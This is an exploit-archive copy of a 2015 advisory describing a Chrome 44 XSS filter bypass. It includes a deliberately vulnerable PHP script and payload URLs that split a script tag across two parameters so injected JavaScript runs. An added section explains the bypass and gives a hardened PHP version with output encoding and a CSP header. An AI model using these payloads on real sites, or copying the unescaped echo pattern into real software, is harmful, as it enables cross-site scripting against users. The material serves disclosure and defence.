Google Chrome 44.0.2403.157 XSS Filter Bypass

CVE:               N/A
Category:          CWE-79
Price:             N/A
Severity:          High
Author:            Unknown
Risk:              High
Exploitation Type: Remote
Date:              2015-08-25
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015080141

Below is a copy:

Google Chrome 44.0.2403.157 XSS Filter Bypass
********************************************************************************************
# Exploit Title: Google Chrome Last Version Bypass Anti-XSS filter Vulnerability
# Exploit Author: Mahdi.Hidden
# Date: 2015-08-22
# Vendor Homepage : http://chrome.google.com
# Software Link: https://www.google.com/chrome/browser/desktop/
# Version: Version 44.0.2403.157 m
# Tested on: Linux & Windows
********************************************************************************************
As you know, Google Chrome refuses to execute JavaScript that it detects as a reflected
cross-site scripting payload. That is a security feature (Chrome's XSS filter) and it
stops many XSS attacks.
Now suppose you have a vulnerable PHP script like this (for example chrome.php):

<?php

// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."<br><br>";

// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."<br><br>";

?>

(This PHP script takes two parameters and prints them without any filtering, which
allows JavaScript injection.)

If you test a cross-site scripting payload like this in Google Chrome:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/)</script>&text2=Something

the JS code will appear in the page source, but you will get no alert, and if you view
the source you will find your code shown with red highlighting.
That is Chrome's XSS filter at work; if you try other payloads you will see the same
result.
But let's try using a script tag (<script>) without closing it, i.e.:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/)&text2=Something

Again the code will be shown, but this time without any red highlighting, and the JS
code is treated as plain HTML text because the tag is never closed.
Now it has to be closed, so let's try closing the script tag in $_GET['text2']:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/)&text2=</script>

In this case your code is shown completely, without any red highlighting or anything
like it, but it is still treated as HTML text.
So let's try using quoting: put the non-code text (the HTML that the script prints
between the two parameters) inside a pair of quotation marks. For example, using
void(''): put void(' in parameter one and close it in parameter two with ')
Now let's try it:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/);void('&text2=')</script>

OK! You will see the alert: your JS code executes, which is what we wanted.
You can use document.write('') or similar instead of void('').

For example:

http://[HOSTNAME]/[PATH]/chrome.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>
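The bypass works because the browser-side filter is a heuristic: it looks for a reflected script that matches the request, and once the script body is split across two parameters (with the page's own "<br><br>This is text2:" output in between) no single parameter reflects a complete script. The fix belongs in the application, not in the browser; Chrome's XSS Auditor was removed entirely in Chrome 78. The following is an added example, not code from the original advisory or its author: a hardened version of the chrome.php script above. It keeps the advisory's parameter names text1 and text2; the helper names html_text() and get_param() and the response headers are my own assumptions about how one would deploy such a page.

```php
<?php
// Added example (not part of the original advisory): hardened chrome.php.
// The vulnerable script echoes $_GET['text1'] and $_GET['text2'] raw. This
// version encodes both values for an HTML text context and adds a
// Content-Security-Policy so that a missed encoding elsewhere still cannot
// run inline script. Parameter names come from the advisory; helper names
// and headers are assumptions for this example.

declare(strict_types=1);

/**
 * Encode a value for insertion into HTML text (or a double-quoted attribute).
 * ENT_QUOTES also encodes single quotes, which is what defeats the
 * void(' ... ') splitting used in the advisory; ENT_SUBSTITUTE replaces
 * invalid UTF-8 sequences instead of making htmlspecialchars() return ''.
 */
function html_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Read a GET parameter as a string. Array-style input such as ?text1[]=x
 * would otherwise reach htmlspecialchars() as an array and raise a TypeError,
 * so anything that is not a string falls back to the default.
 */
function get_param(string $name, string $default = ''): string
{
    $value = $_GET[$name] ?? $default;
    return is_string($value) ? $value : $default;
}

// Defence in depth: declare the charset so the browser cannot sniff the
// response into a different encoding, forbid inline script outright, and
// stop MIME sniffing.
header('Content-Type: text/html; charset=UTF-8');
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'");
header('X-Content-Type-Options: nosniff');

$text1 = html_text(get_param('text1'));
$text2 = html_text(get_param('text2'));

// Same output layout as the original script, but the values are now inert text.
echo "This is text1: {$text1}<br><br>";
echo "This is text2: {$text2}<br><br>";
```

With the advisory's final payload, the response now contains `&lt;script&gt;alert(/XSS/);void(&#039;` and `&#039;)&lt;/script&gt;` as literal text, so there is no script element for the browser to close or execute, and the CSP header would block any inline script that did slip through. The encoding is context-specific: htmlspecialchars() is correct for HTML text and quoted attributes only, and a value placed inside an existing script block, a URL, or a CSS rule needs the encoder for that context instead.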

Thanks.
****************

# Details:
http://ashiyane.org/forums/showthread.php?148940

# Exploited by Mahdi.Hidden
# Ashiyane Digital Security Team


Copyright ©2024 Exploitalert.
